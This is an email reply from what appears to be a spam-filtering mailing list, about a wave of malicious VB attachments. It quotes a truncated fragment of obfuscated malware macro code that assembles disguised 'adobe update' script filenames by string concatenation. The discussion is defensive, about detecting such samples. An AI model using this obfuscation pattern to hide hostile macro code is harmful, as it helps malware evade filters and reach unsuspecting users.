Thank you all for your comments, very much appreciated
Date: Wed, 18 Feb 2015 12:28:11 -0700
Subject: Re: Recent spate of Malicious VB attachments II

        On Wed, 18 Feb 2015 14:16:02 -0500

Joe Quinn <[hidden email]> wrote:

> On 2/18/2015 2:10 PM, Reindl Harald wrote:

> > the source contains at least socket:// and heavy pulsating disk-IO 

> > noticed from the RAID10 as long the process was active - will give

> > it a try in a isolated VM to look what it does the next spare time

> Or if there was an SA-style classifier for malware that scores files

> in addition to "this is a keylogger".

A lot of the samples we see heavily obfuscate the VB code.  Example:

Sub h()

     ds = 99 + Sgn(98) + Sgn(902) + Sgn(-5)

     USER = Module1.Travel("username")


     jks = ds

     PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" 
& ""

     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""

     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + 
"p" & ""

     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""


     PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""

     VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""

     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""

... more of the same

This makes a simple-minded "strings" inadequate. :( I've also seen

highly-obfuscated Javascript code that builds up strings and then evaluates

them as Javascript.





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